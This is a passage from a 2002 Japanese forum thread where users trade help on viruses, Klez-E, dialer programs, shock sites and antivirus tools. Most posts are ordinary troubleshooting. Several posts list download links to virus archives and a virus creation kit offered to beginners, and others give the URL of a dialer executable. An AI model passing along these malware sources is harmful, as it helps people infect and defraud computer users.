www.southern-charms.com/pat/p8618.jpg 精神的ブラクラ
www.bayer-doyaku.com/roach/gerroa.jpg 精神的ブラクラ
www.mayhem.net/juke/bodiesbeat1.html 精神的ブラクラ
i.kebi.lycos.co.kr/~artkebi/whi.html 精神的ブラクラ
kitty-guys.hypermart.net/degawa.cgi 精神的ブラクラ
www.top.or.jp/~godhand/a2.html 精神的ブラクラ
members.tripod.co.jp/hama_ayu_poa/Daybreak.htm 精神的ブラクラ
www.dab.hi-ho.ne.jp/paramo/ 精神的ブラクラ
www.hpsozai.com/up/ap.cgi?get=2002212214830.jpg 精神的ブラクラ
bbsrent.vibe-station.com/uploader/img-box/img30.jpg 精神的ブラクラ
www.yaromat.com/macos8/index.htm ジョーク
mbspro5.uic.to/user/mikkixi.html ブラクラ
mitsuura.tripod.co.jp/offmeeting.jpg ブラクラ
www.hoops.ne.jp/~zaqro34/001MOVEBOX/index.html ブラクラ
www2.ocn.ne.jp/~ling/img/dog_p16.jpg グロ
home.kimo.com.tw/netspooky/kikia/kikia.swf 恐怖
www.eternal.rest.org.uk/58cy/30s/myh-cnb1/30s512.jpg グロ

506 :cheshire-cat:02/03/02 22:00
漏れ的には、エクセプションよりもババアのグロ画像がブラクラ。
精神的に。

507 :名無しさん@お腹いっぱい。:02/03/02 22:05
半角板にはられたgodhandというサイトに誤っていってしまいウイルスを
感染させられました。オンラインウイルスチェック済みです。
対策ソフト持ってなくて・・・鬱。体験版もあらかた使い切ってしまった・・・。
そのウイルスサイトへのリンクを貼った人を法的に訴えることは可能でしょうか?

508 :cheshire-cat:02/03/02 22:10
>>507
それってジャバスクで別窓開く奴だっけ?
「どこにインストールされたのかわかりません」、みたいな。
どこにもDLされてないよ。
ソース見てみ、単なる悪戯サイト。

509 :名無しさん@お腹いっぱい。:02/03/02 22:20
>>508 いや、確かにオンラインウイルスチェックで一つだけでしたが
ウイルス反応が出たのです。もうどうしたらいいのか・・・。
お金ないからソフト買えないし・・・。ともあれご進言ありがとうございます。

510 :cheshire-cat:02/03/02 22:24
>>509
ちょっと待て。
何が出た?どこに?
別サイトか?

オンラインチェックはウイルス定義ファイルが最新じゃない時があるから、これ。
ジャバスク使ってないとDLさせてくれないけど。
アンインストールに失敗することは無いから、Antidote簡易版を薦める。
http://www.vintage-solutions.com/Japanese/Antivirus/Super/

511 :名無しさん@お腹いっぱい。:02/03/02 22:35
>>510 さっそくそのサイトへ行ってみましたがタダなんですね!
ありがたやありがたや・・・。
なんとお礼を申し上げてよいやら・・・。とりあえずそのソフト落として
みます!また事後報告に参りますね!

512 :名無しさん@お腹いっぱい。:02/03/02 22:40
半角のそのサイトを覗いてみましたがどうやら自分以外には
被害者は出ていないようです。それとも自分と同じく何も言えずに
いるのだろうか・・・。そのウイルスサイトへのリンクから大分
レスが結構付いているだけにとても不自然というか、不気味ですね・・・。
そのサイトのアドレスの一部に間違いなくgodhandとあります。
自分の下心が招いた悲しい結果だけに何ともやりきれません。

513 :名無しさん@お腹いっぱい。:02/03/02 22:54
gohandは推定20万人の初心者が騙されてこの板に泣きついてきてるんだよ。
gohandにいっても、ウィルスチェックに引っかかる可能性は全く無いわけだ。
> いや、確かにオンラインウイルスチェックで一つだけでしたが
どこのオンラインチェックでなんと言うウィルスが検出されたんだ?


514 :名無しさん@お腹いっぱい。:02/03/02 22:54
>512
このスレを最初からじっくりと読み直せ。

515 :名無しさん@お腹いっぱい。:02/03/03 00:38
>>510 cheshire-catさん、治りました!教えてもらったアンチドートというソフト
を念入りに2回かけて、もう一度トレンドマイクロのオンラインスキャンにかけてみたら
ウイルスは検出されませんでした!ほんとーーーーにありがとうございました。
おかげで助かりました。このご恩は忘れません。m(__)m

>>513 トレンドマイクロのオンラインスキャンを利用しました。検出された
ウイルスは取り乱してしまっててちょっと覚えてないんですけれど、数量は1、
ウイルスが検出されたとハッキリ表示されました。もうこれに懲りて怪しげな
サイトは踏みません。


どうもお世話になりました。ここっていい人多いんですね。それでは失礼します。

516 :名無しさん@お腹いっぱい。:02/03/03 00:42
まぁそのウィルスは他のところでもらってきたものだーね(godhandは無害なので)

517 :名無しさん@お腹いっぱい。:02/03/03 04:26
あんまり「godhandは無害」と断言すると、
似たようなURL使って有害サイト立ち上げる
阿呆が出てくると思われ…

518 :427:02/03/04 00:40
まえに書いたアフォです。

あれいらい、www.yahoo.comやwww.google.comのような有名どころにアクセスできなくなりました。
pingかけても全く反応なしです。

いろいろWEBをあさってみましたがさっぱり原因不明。もちろんウイスルなんていません。
やってきたグリーティングコムなるところを調べてもすでにもぬけの殻。
どうもどっかの会社が大量にアドレスを購入して再販しているものらしく、
いかにも詐欺の温床と言った使われ方したみたいで。

あああ、どうやったらみれるようになるのかな。
ちなみにIE6です。(これが一番の原因かな)

519 :名無しさん@お腹いっぱい。:02/03/04 00:52
>>518
はやくクリーンインストールしろ

520 :名無しさん@お腹いっぱい。:02/03/04 00:54
フォルダ名は残って、中のファイルだけをクリアするウィルスってあるの。
今日、ノートン先生が悲鳴をあげて死んだあと、目の前でデスクトップの
アイコンが半分くらいなくなった。DとEのFAT32ドライブがフォルダだけ
残して空っぽになった。


521 :いらっしゃいませ:02/03/04 01:07
HDぜんぶ消去した上ズタズタに!!ウィルス 2台目
http://pc.2ch.net/test/read.cgi/sec/1012296560/l50

破損、トロイ、ウィルス入り 3
http://tmp.2ch.net/test/read.cgi/download/1010071094/l50

522 :名無しさん@お腹いっぱい。:02/03/04 01:14
>>520
頼むからクリーンインストールしてくれよ。お願いします。

523 :名無しさん@お腹いっぱい。:02/03/04 01:28
これだけは見るな
ttp://skyscraper.fortunecity.com/laser/928/virusdownload.shtml
ttp://tokyo.cool.ne.jp/blackhat

524 :もう、だめぽ:02/03/04 02:01
ウイルスに感染したら、
すべてクリーンインストールしなきゃ、だめぽ!

525 :名無しさん@お腹いっぱい。:02/03/04 02:51
【ネット】『C』で記述した初のウイルスが登場
http://news.2ch.net/test/read.cgi/newsplus/1015048480/l50

これ何?

526 :名無しさん@お腹いっぱい:02/03/04 03:01
絶対にメールが来るハズのないアドレスからメールが来まして、不審
に思って件名を検索したらW32/Klez-Eがそのような件名のメールを
送ることがあることが分かりました。
しかし、それ以前にこのメールには添付ファイルがついていませんで
した。

オンラインスキャンかけてもウイルスは見つからなかったので感染等
の問題はないのだとは思いますが、あまりにも謎なので…。
メール自体は空のHTMLメールで、123KBくらいあったと思います。
このメールは結局ウイルスではない、ということでよいのでしょうか?

ウイルスに関する知識が乏しいものでちょっと不安になってしまい質
問させて頂きました。

527 :名無しさん@お腹いっぱい。:02/03/04 05:32
最近
editor-○○○@eros.stoen.net
みたいなメールがやたら来るんだけど・・・・どうすればいいかな?

528 :名無しさん@お腹いっぱい。:02/03/04 06:33
>>527
削除

529 :427:02/03/04 09:41
>>519
やっぱりそれしかねぇべか。
LANで繋がってる他のパソコン(マク)は問題ないからなぁ。
メンドクサイクリーンインスト、うかつにクリックした痛い代償じゃ。

530 :名無しさん@お腹いっぱい。:02/03/04 12:28
>>527
うわ〜それうちにも来るよ・・(´Д`;)
SPAMだと思うんだけど名前まで書いてやがった(よく使う偽名ですが・・)
たぶん海外で登録したフリメから情報流されたんだろうなぁ・・

531 :editor-○○○@eros.stoen.net :02/03/04 15:23


532 : :02/03/04 15:58
>>527
おまえのパソコンがアブねえよ!
なんて書いてるし(w

533 :名無しさん@お腹いっぱい。:02/03/04 16:20
すいません、さっき>28のページを開いてしまったのですが
何か起こっちゃいますか?>29で通報してあるとありましたが
もう大丈夫でしょうか?

534 :名無しさん@お腹いっぱい。:02/03/04 16:31
嘘を嘘と見抜けないひとは(以下略

535 :名無しさん@お腹いっぱい。:02/03/04 16:33
>>533
無くなってるから関係ないよ

536 :名無しさん@お腹いっぱい。:02/03/04 18:01
>>535
ありがとう、安心しました。

537 :名無しさん@お腹いっぱい。:02/03/04 22:58
http://japan.cnet.com/News/2002/Item/020228-2.html?rn

538 :名無しさん@お腹いっぱい。:02/03/05 04:06
WIN32 ZMIST ってみなさん見たことありますか?
今日スキャンしたらひっかかたんですけど。

539 :名無しさん@お腹いっぱい。:02/03/05 23:14
235 age

540 :名無しさん@お腹いっぱい。:02/03/05 23:16
>>539
誤爆

541 :age:02/03/05 23:38
ttp://skyscraper.fortunecity.com/laser/928/virusdownload.shtml
ttp://tokyo.cool.ne.jp/blackhat
ここのウイルスはじめてみたんですけど。
カジノとかストーンとか、面白いですね。
あとピカチュウウイルスと2ちゃんねるウイルスを探しているんですが、
誰かご存知の方いますか?
どんな効果があるのか、ワームなのか詳しく教えてください。

542 :cheshire-cat:02/03/06 00:31
>>541
これか?
http://www.symantec.com/region/jp/sarcj/data/w/w32.pokey.worm.html
2chウイルスは、知らない。

543 :名無しさん@お腹いっぱい。:02/03/06 01:56
きゃーって女の人がさけぶやつを、どこかでふんじゃいました。
いまさらながら・・だれか治し方をおしえてください。


544 :名無しさん@お腹いっぱい。:02/03/06 02:00
いまさらと言うならば過去ログ漁れ

545 :未知のウイルス:02/03/06 02:12
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml

http://www.ebcvg.com/binary.php

未知のウイルス
Bloodhound.HybridCOM
http://www.ebcvg.com/sections/binary/Quest.495.zip

Bloodhound
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
Norton AntiVirusには、Bloodhoundというヒューリスティックアルゴリズムを使用して、
様々なタイプの未知のウイルスを検出する機能があります。
この機能はSymantec Security Responseにより開発されました。
Bloodhoundについての詳細は、
ホワイトペーパーUnderstanding Heuristics: Symantec's Bloodhound Technology
を参照してください。
http://www.symantec.com/avcenter/reference/heuristc.pdf

546 : :02/03/06 04:33
Re: ヌ、倏キB
こういう件名でメールが来たけど、これってやばい?
ちなみに添付つき。

547 :名無しさん@お腹いっぱい。:02/03/06 06:40
>>546
チェックしてみりゃいいだろ
ソフト入れてない、なんて言うなよ

548 :未知のウイルス:02/03/06 12:20
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml

http://skyscraper.fortunecity.com/laser/928/virusdownload.shtml
未知のウイルス
VirusPack
http://skyscraper.fortunecity.com/laser/928/uirs_pak.lzh
Bloodhound.DirActCOM,File.String,HybridCOM
Bloodhound.HybridCOM
http://www.ebcvg.com/sections/binary/Quest.495.zip

Bloodhound
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
Norton AntiVirusには、Bloodhoundというヒューリスティックアルゴリズムを使用して、
様々なタイプの未知のウイルスを検出する機能があります。
この機能はSymantec Security Responseにより開発されました。
Bloodhoundについての詳細は、
ホワイトペーパーUnderstanding Heuristics: Symantec's Bloodhound Technology
を参照してください。
http://www.symantec.com/avcenter/reference/heuristc.pdf

549 :Worm/Klez-E』が3月6日に発症:02/03/06 12:53
「『Worm/Klez-E』が3月6日に発症」とアンチウイルス・ベンダー各社が警告
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20020306/4/

550 :IE6のクッキーについて:02/03/06 14:17
IE6 を入れた人から、私が管理しているあるサーバが
クッキー書き込みエラーとなり次のページに進めない
との連絡を受けるようになりました。
その方のクッキー情報書き込みの制限を解除して貰っても
書き込みエラーが出るようで困ってしまっています。
同様の現象をお持ちの方いらっしゃいませんか?

551 :名無しさん@お腹いっぱい。:02/03/06 14:21


552 :名無しさん@お腹いっぱい。:02/03/06 14:22
スマソ、間違えた

553 :名無しさん@お腹いっぱい。:02/03/06 14:26
>>550 それってどこがウィルスなの?小一時間…以下略

554 :541:02/03/06 17:09
>>542
ピカチュウウイルスの情報ありがとうございました。
2ちゃんねるウィルスの情報ひきつづき待ってます。

555 :cheshire-cat:02/03/06 18:23
>>554
2chウイルスって何?
2ch dukeのことかな。

あめぞうウイルスは持ってる(ウイルスじゃないけど)。

556 :554:02/03/06 18:43
>>555
多分それじゃないかと思います。
なんか
www.media-0.com/www/mild/bakuhatsu.html
を最後まで進んでいくとダウンロードする画面までいくんですが、
そこでダウンロードしたらウイルスめいたものが来て困っています。
ウイルスかどうか猛者に鑑定して欲しいです。

557 :cheshire-cat:02/03/06 18:53
>>556
2chDukeって、確か8つくらい出てたよね。
今はもう効かないかと。

558 :名無しさん@お腹いっぱい。:02/03/06 19:43
VIRUS(VIRII)の定義が悪質なプログラミングだとしたら
間違いなく
www.media-0.com/www/mild/bakuhatsu.html
の先にあるものはウイルスといえる。

559 :名無しさん@お腹いっぱい。:02/03/06 20:17
http://64.71.32.81/ERODIGITAL/ax.html
ここでJABAを切ってる人をクリックする。
そしてダウンロードしたもの。

560 :名無しさん@お腹いっぱい。:02/03/06 20:25
_(半角アンダーバー)のみのフォルダができたんですけど
これってウイルスですか?けしても
しばらくするとまた出てきます。

561 :556 559:02/03/06 23:34
さらにもっと詳しく書けば
http://64.71.32.81/ERODIGITAL/erox.exe
です。
erox.exeというのがいかにもって感じで怪しいです。
誰か我こそはって方調査おながいします。


562 :名無しさん@お腹いっぱい。:02/03/06 23:37
>>556
ダイアルアップ先を国際通話に書き換える。
胴元は ttp://www.dtiserv.com/jp/index.html 見るならJSとActiveXはきっとけ。

こういう悪質な会社にも証明書を発行するVeriSign Commercial Software Publishers CA
なんて信用したくないという奴は

インターネットオプション→コンテンツ→証明書の信頼されたルート証明機関
からVeriSign Commercial Software Publishers CAを探し
表示→詳細設定→拡張キー使用法→プロパティの編集
でコード署名のチェックをはずしてしまえ。

www.erokichi.com/18over/ax.html?0 で証明書に問題ありが出れば成功。


563 :名無しさん@お腹いっぱい。:02/03/06 23:53
>>554
最近だとあれだろ?
・・・そうそう、多分あれ。

関係無いけど「ドラゴンボール」って言うのも有るよ。
探してみ(w
ところで、全然関係無いけど、HTML+TIME2って何だっけ。。




564 :556:02/03/06 23:54
>>562
親切なカキコありがとうございます。
やはり強制接続でしたか。
何度けしても消えないので精神ブラクラですね。

565 :cheshire-cat:02/03/06 23:55
>>562
密かにメモします。

566 :名無しさん@お腹いっぱい。:02/03/07 08:23
JS_APPACTXCOMP.A

と言うウィルスに感染しました。
自分の探し方が悪いのかもしれませんが、
上記のウィルス、データベースに無いみたいなんです。
どのようなウィルスか判る方いらっしゃらないですか?

(XP IE6 ウィルスバスター2002)


567 :566:02/03/07 08:34
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=JS_APPACTXCOMP.A

トレンドマイクロ(英語サイト)で情報見つかりました。すんまそん。
英語が全く駄目なので、エキサイトで翻訳したのですが、
わかったのは、危険度・破壊力は低く、ActivXがどーのこーの・・・・
ってことだけでした(;´Д`)

ゴチャゴチャ書きましたが、とっとと削除しちゃっても構わないのでしょうか?
また、その後にやるべき事はあるのでしょうか?重ね重ねおながいします。

568 :名無しさん@お腹いっぱい。:02/03/07 09:15
>>567 以下に詳細が日本語で書かれている。ウィルス名が違うのは会社によって呼び方が違うから。
http://www.symantec.com/region/jp/sarcj/data/j/js.exception.exploit.html
http://www.nai.com/japan/virusinfo/virU.asp?v=Unsafe%20JS

569 :名無しさん@お腹いっぱい。:02/03/07 09:24
>>568 違ってるかもしれない・・・

570 :566:02/03/07 09:42
>>569さん
リンク先を読んでウィルスを削除してから
スタートページとお気に入りとメール送受信でチェックしましたが
異常は見つかりませんでした。

と、手放しで喜んでるのもアレなんで
自分でももう少し調べてみようと思います。
ありがとうございます、ほんとに助かりました。

571 :名無しさん@お腹いっぱい。:02/03/07 09:49
>>570 念のためウィルスチェックはやっといてね。

572 :名無しさん@お腹いっぱい。:02/03/07 12:26
http://www.xxx.or.jp/~haruki/mind/virus.html
正直もう だめぽ

573 :名無しさん@お腹いっぱい。:02/03/07 13:03
>>572 何がだめなんだい? オジさんでよかったら話してごらん。

574 :572:02/03/07 13:33
http://64.71.32.81/ERODIGITAL/erox.exe
をインストールしたまま気づかなくて長時間時間2ちゃんばかりやってた。

575 :名無しさん@お腹いっぱい。:02/03/07 13:56
>>573
知らないが、かたはしからダウンのところクリックしたんでないかえ?

>>574
人様に迷惑だけはかけるんじゃないよ。

576 :名無しさん@お腹いっぱい。:02/03/07 14:20
>>574 ダイヤルQ2か国際電話に接続を切り替えるやつね。かわいそうに。
http://pc.2ch.net/test/read.cgi/isp/1010717649/312-350 にも被害者いるね。

577 :574:02/03/07 14:35
>>575
わたしはどうしたらよいでしょうか?
人様に迷惑?とはなんですか?
これはウィルスといってもよいですね。

578 :名無しさん@お腹いっぱい。:02/03/07 14:48
>>577 このあたりに対策があります。こうしている今も国際電話につながってるかも。
http://www.aa.wakwak.com/~dalk/q2log10.html
人様に迷惑はかけてないと思うよ。何万も請求が来るだけ。

579 :578:02/03/07 15:09
>>578
ご親切にどうもありがとうございました。
わたしはAirH"でNO!国際電話をインストールしていたんですが。
EROXソフト自体トロイのようなもので、そこから個人情報が漏れるということは
考えられますか?


580 :_:02/03/07 16:15
先ほどLOVELETTERに掛かったファイルを落としてしまい、
そのファイルが削除出来ないのでNortonAntiVirusで検疫
したのですがこの後はどうすればいいのでしょう?
というか検疫ってどういった物なのでしょう?

581 :名無しさん@お腹いっぱい。:02/03/07 16:36
>>579 全く皆無ではないが漏れてはいないでしょう。
ダイヤルアップの項目が書き換えられているので戻すことを忘れずに。
Dailsoftとかbobonetがあれば削除。
その状態では国際電話に掛かってないと思われ。

>>580 NAVの「レポート」の「検疫項目」で「レポートを表示」で該当ファイルを
選択して削除する。「検疫」とは隔離みたいなもの。検疫場所に入ったファイル
(つまり検疫項目) はシステムの残りと相互作用しないので、感染ファイルであっ
てもウィルスは伝染しません。

582 :580:02/03/07 17:10
>>581
どうも有難う御座いました、お蔭様で無事削除出来ました。
説明も簡潔で分かり易くして頂き、とても感謝しています。
ではでは、失礼致しました・・・。

583 :579:02/03/07 17:23
>>581
そうですか。なら大丈夫です。すみません。
ありがとうございました。

584 :名無しさん@お腹いっぱい。:02/03/07 18:50
さっきからノートンで警告が出まくりなんですが
Default Block Backdoor/SubSeven Trojan
とかいうのが出てくるんですが、これはどういうものなんでしょう?
また、どこから攻撃されてるのかわかるものなんですかね?

585 :名無しさん@お腹いっぱい。:02/03/07 20:40
>584
ノートンスレの1を見てこい。


586 :cheshire-cat:02/03/07 21:25
>>584
コピペ
http://pc.2ch.net/test/read.cgi/hack/1014456049/497
http://pc.2ch.net/test/read.cgi/hack/1014456049/546

587 :名無しさん@お腹いっぱい。:02/03/07 22:05
ステルスUDPポート(2603)をC:\.....moonb.exeから遮断しました。
と言う警告をノートンが出したんですけど、平気なんでしょうか?

588 :cheshire-cat:02/03/07 22:17
>>587
ステルス=居ないふり→「ふーん、次いくか」
ブロック=居るけど防いじゃったよ→「よっしゃ、チャレンジ(笑)」

589 :名無しさん@お腹いっぱい。:02/03/07 22:40
すみません質問させてください。
51 を変換しようとしたら ヲタ、
いたって を変換しようとしたら ヨガって
等になりました。
何者かに侵入され、辞書機能いじられてますか?

590 :cheshire-cat:02/03/07 22:48
>>589
ATOKかIMEか知らないけど、絶対ユーザー辞書いじられているかと。
ネット経由じゃなくて、知人が直接登録してやった悪戯かも。
漏れも、「きむら→本村」とか登録されて、かなり長い間気付かなかったことがある。

591 :名無しさん@お腹いっぱい。:02/03/07 22:51
>>590
ありがとうございました。
XPのFWって役に立たないんですね。
駆除ツール探してきます。

592 :名無しさん@お腹いっぱい。:02/03/07 22:52
>>590
他人に操作されるのってセキュリティ尼杉
離籍するときスクリーンロックせんの?

593 :cheshire-cat:02/03/07 22:56
>>591
XPのFWに言及したつもりは無いんだけど。
>>592
してるけど、既知外が来てるのに気付かずに油断した。

594 :590:02/03/07 23:01
すみません。当方、XPのFW入れてたのにあっさり入られたようなので。

も一つ質問です。ATOKって何ですか?検索したら別の(赤い箱のソフト)
ヤツばっか出てくるんですが・・・。

595 :名無しさん@お腹いっぱい。:02/03/07 23:03
>>587
レスありがとうございました。
ノートンはデフォルトの設定が甘いみたいなんで
色々いじくってたんですが、わからないことが多すぎる〜。
またわからない事があったらよろしくお願いしますね。

596 :cheshire-cat:02/03/07 23:04
>>594
日本語入力するためのエンジンみたいなソフト。
MS OFFICEならIME入っているけど、一太郎ならATOK。
スレッド違いなんで、そろそろ止めませんか?

597 :590:02/03/07 23:06
>>596
ありがとうございました。

598 :ところで:02/03/07 23:30
6日を過ぎましたが、KlezE発症した人いますか?
うちは職場に5通来ました。

599 :cheshire-cat:02/03/07 23:38
>>598
KLEZ.Eの変種は4つほど集まったけど。
フォーマットしてくれなかった。
検出名はどれもKLEZ.Eだったんだけどね。

600 :なるほど:02/03/08 00:14
検出名が同じでもさらに変種の可能性があるんですね。
じゃあ、うちに来たのも次の6日までファイルの書き換えは大丈夫なんて
たかをくくってはいられないですね。
なかなか周知の難しい職場なんで
時間かせぎだけが唯一の望みだったんだけど。

601 :さっきびっくりしたひと。:02/03/08 03:04
今、丁度ヘンなメールが着たんで、訊きたいんですけど・・・
添付つきで、送信者が、自分のメアドの@マーク前の部分と同じで、そのあとに、「-I」って
書いてあるんです。
で、件名欄には、「Re        」だけ。
ココロあたりないし、怖いから、削除したら、ウイルス削除したときとおんなじ反応があったんです。
これってば・・・やっぱりウイルスですか?

602 :名無しさん@お腹いっぱい。:02/03/08 03:29
今パソコンの電源をつけて、
アウトルックエキスプレスを起動して、
メールを受信し始めたら、
モニターの電源が切れました。

ウイルスなのでしょうか?
(今はモニターの電源はついてます。)

603 : :02/03/08 05:17
>>601
>>602
飽きたよ その最後の台詞
ウイルスチェックしろよ


604 :名無しさん@お腹いっぱい。:02/03/08 05:49
>>603
ハァ?

605 :名無しさん@お腹いっぱい。:02/03/08 07:36
>>その最後の台詞 ウイルスチェックしろよ

ダサいよあんた。

606 :ニムダ:02/03/08 07:57
時刻,受信/送信,プロトコル,送信元IPアドレス,送信元ポート,送信先IPアドレス,送信先ポート,説明
07:14:06,受信 ,TCP ,61.203.200.61,2010 ,192.168.1.2 ,80 ,Nimda

a. [IPネットワークアドレス] 61.203.200.0
b. [ネットワーク名] UN-AN
f. [組織名] 有限会社アンクルアンティーク
g. [Organization] Un-cle An-tique LTD.
m. [運用責任者] MY1520JP
n. [技術連絡担当者] MB002JP
p. [ネームサーバ] dns.un-an.gr.jp
p. [ネームサーバ] dns1.ile-tec.co.jp
y. [通知アドレス] baba@docom.co.jp
[割当年月日] 2001/05/30
[返却年月日]
[最終更新] 2001/06/14 10:08:17 (JST)
baba@docom.co.jp
この上のメアドにメールしてもいいんですか?
それとも、放置が基本なのですか?

607 : :02/03/08 09:10
>>606
基本は放置だろうな


608 :名無しさん@お腹いっぱい。:02/03/08 11:21
PE_MAGISTR.A(B/OVR/DAM)
って言うウィルス名を聞いたんですが、誰かご存知のかたいらっしゃいますか?
検索かけても見つからなくて。

609 :名無しさん@お腹いっぱい。:02/03/08 11:33
>>608
次から質問しないでください、おながいします
http://www.google.co.jp/search?q=pe_magistr.a&hl=ja&lr=

610 :名無しさん@お腹いっぱい。:02/03/08 23:13
2ちゃんねらーの力で子供達を救おうよ(連日連夜 祭り開催中!)
何処の板から来たかを明記してくれると、みんなのやる気が上がります!
【クリック】 押してみっかな【クリック】http://live.2ch.net/test/read.cgi/festival/1015502074/l50
これを見て少しでも協力する気になった人
この文を色々な板にコピペしてくれると助かります
 

611 :名無しさん@お腹いっぱい。:02/03/08 23:36
数時間前から困っています。

送られてくるメールほとんどに添付ファイルがあるのです。
友人の携帯のメールからメーリングリストまで、
ほとんんどのメールについています。
RE●●とか空白のタイトルではないのでどのようなウィルスなのか
わかりません。
心あたりがある方、ぜひおしえてください。
既出でしたらすみません。
よろしくお願いいたします。

612 :名無しさん@お腹いっぱい。:02/03/09 00:02
KLEZ_Eにかかっとるようなのだが…
今見れないjpgとかmpgもう一回見られるようにするにはどうしたらいいのか…
やっぱアンチウィルス入れるべきなのか…

613 :名無しさん@お腹いっぱい。:02/03/09 01:33
http://www.trendmicro.co.jp/vinfo/
‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥‥○

■ 新 種 ウ イ ル ス 情 報━━━━━━━━━━━━━━━━━

● WORM_GIBE.A(ギベ)
マイクロソフト社のセキュリティアップデートプログラムと偽る

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

○ウイルス名: WORM_GIBE.A
○危険度:低
○対応ウイルスパターンファイル:235 以降 ※1

○ウイルス活動:
メールの添付ファイルで広まります。メールの内容は次のとおりです。


614 :名無しさん@お腹いっぱい。:02/03/09 06:33
>>やっぱアンチウィルス入れるべきなのか…
あたりまえ

615 :_:02/03/09 13:24
1週間ほど前「このメールを削除したらHDDをフォーマットする」
みたいな英文のメールがきた。(添付ファイル無し)
ウザイんで当然削除。
そして今日、WIN2000はお亡くなりに為りました。
(ノートンのautoprotectはかけてありましたが、無反応でした。)
一体何のウィルスだったのか情報希望

616 :名無しさん@お腹いっぱい。:02/03/09 13:31
>>615
頼むからネタだと言ってクレ

617 :_:02/03/09 13:35
>>616
イヤ、マジだから聞いてるんよ

618 :名無しさん@お腹いっぱい。:02/03/09 13:41
そのメールとは無関係だったことにしようYO

619 :_:02/03/09 13:46
>>618
そうであって欲しいよ、マジで。
漏れだけならそれで良いし・・・
失ったDATAがイタイYO

620 :名無しさん@お腹いっぱい。:02/03/09 14:08
>>615 そのメールはHTMLだったのか?

621 :_:02/03/09 14:52
>>620
テキスト形式だったと思うが、
そんな事ありえないよね?
HTML形式だったのかなぁ。
ちなみにM$のメーラー使ってました。

622 :助けて:02/03/09 15:47
パソコンがKLEZ.Eってウイルスが感染されました。ソフトを利用して
ウイルスを駆除しましたが、.xls と.jpgの拡張子を付いているファイルを
全部壊されました。EXCLEのファイルに大事なデータが入っていますので
回復できるかどうか、回復できるならその方法も教えて頂けませんか。

623 :cheshire-cat:02/03/09 15:56
>>622
こういう事?
>拡張子が.txt、.htm、.html、.wab、.doc、.xls、.jpg、.cpp、.c、.pas、.mpg、.mpeg、.bak、.mp3のファイルを0で埋め尽くす

エクセルってツール→アドイン→自動保存を利用していると、編集中にテンポラルファイルみたいなのを作ってくれるよね。
Final Dataとか使ってさ、それをサルベージするとか。

624 :助けて:02/03/09 16:11
Final Dataがなんですか、EXCELに対して初心者ですのでもうちょっと
詳しい説明を書いて頂けませんか。

625 :cheshire-cat:02/03/09 16:35
詳しい?

1)自動保存を有効にしていたならば
デスクトップにエクセルのファイルを一つ置いて、それを開いて編集。
その時、半透明のファイルが出来る?全てのファイルを表示にしていると。

自動バックアップファイルなんだけど。エクセルを終了すると、勝手に消える。
これをデータ復旧ソフトのFinal Dataで拾う。
回収したファイルの拡張子を、xlsに変更。

2)FDやMOにそのファイルを移動させた事があるなら
もう削除していたとしても、そのメディアから、同様にFinal Dataで復旧できるかも。
クイックフォーマットしていても、回収できたりする。
「通常のフォーマット」だとまずいけど。

3)編集のため、一旦別の名前のコピーを作っていて、それを編集後に削除した経験があるなら。
Final Dataで拾う。

FinalDataとかは、削除してしまったファイルの復旧ツールです。
1-3に該当しないなら、上書き系なのであきらめるしかないかと。

FinalData
http://www.finaldata.ne.jp/

626 :cheshire-cat:02/03/09 16:42
つまり削除済みのファイルは、ファイルの位置とかの情報は消えるけど、ファイルのデータそのものが残っている事がある。
そういう状態のファイルまでは、KLEZに上書きされないかと。
それをサルベージするという話。

飲み会行ってくるんで、あとは自己解決してくださいな。

それでも駄目だと言うなら、お値段は高いけど。
http://www.nifty.com/eclinic/

627 :別スレ351 ◆enghYAOw :02/03/09 21:19
どもチシャ猫さん。先日はお世話になりました。
今の段階ではあれから特に変わったことはありません。
まだウィルスが潜んでることは確かなのですが…

え〜っと、KLEZ_Eに感染して見れなくなった画像とか動画ファイルは>>622の言ってる
「壊された」って表現が正しいんですか?
てことは、感染する前に保存しておいたファイルはもう使えないってことですよね?
使えないなら削除するだけなんですが…
一応OSインストールしなおしてからDLしたファイルは見れるようになりました。

メールで質問すればよかったんですが、すいません。

628 :名無しさん@お腹いっぱい。:02/03/09 21:27
現在謎のウイルスを確認。
アンチドートスーパーライトでスキャンしたらWin32.ZMistというものを検出。
ウイルスバスターでは検出できず。

http://www.symantec.co.jp/region/jp/sarcj/cgi-bin/virauto.cgi?vid=10598によると
.exeファイルに感染しているらしいのに、C:\Program Files\Fudeoh50\BIN\addrdic\PMLTDB32.DLLに感染の報告がされてる。
誤検出でいいのかな・・・・・・

629 :(゚ρ゚)アウアー :02/03/09 21:39
>>628
うひゃ、、、Z0mbie・・・なの?
ttp://www.vnunet.com/News/1129775
↑ココに記事書いてある奴か??
多分そうだな。。
厄介だな。。。。。。。。
つか、、、ポリモエンジン自体、簡単に落せるし。。。

630 :(゚ρ゚)アウアー :02/03/09 21:57
http://vil.mcafee.com/dispVirus.asp?virus_k=99382
一応張っとく。
・・・・マカヒだとW32/Zmist.gen


631 :名無しさん@お腹いっぱい。:02/03/09 22:14
平成14年3月××日  預 金 保 険 機 構  理 事 長 談 話
(三井トラスト・ホールディングス株式会社の金融整理管財人への就任について)
本日、金融庁長官より、預金保険法第74条に基づく管理を命ずる処分を受け
た三井トラスト・ホールディングス株式会社の金融整理管財人として、金融
実務精通者としての法人たる預金保険機構、弁護士 ○○ ○○、公認会計
士 ○○ ○○の三者が選任された。
当機構としては、これまでの金融整理管財人としての経験等を生かし、他の
金融整理管財人ともよく協力して適切な業務運営に努めてまいりたい。
当機構から、三井トラスト・ホールディングス株式会社に派遣するスタッフは、金
融整理管財人代理 ○× ×○以下約30名である。
なお、三井トラスト・ホールディングス株式会社傘下の各行の預金等は全額保護さ
れており、善意かつ健全な借手への融資も継続する方針であり、利用者におかれて
は心配されることなく、冷静な対応をお願いしたい。


632 :名無しさん@お腹いっぱい。:02/03/09 22:18
>>631
これなに?

633 :名無しさん@お腹いっぱい。:02/03/09 22:22
>>682
漏れも同じじゃ
で、アンチドートに分析たのんだよ

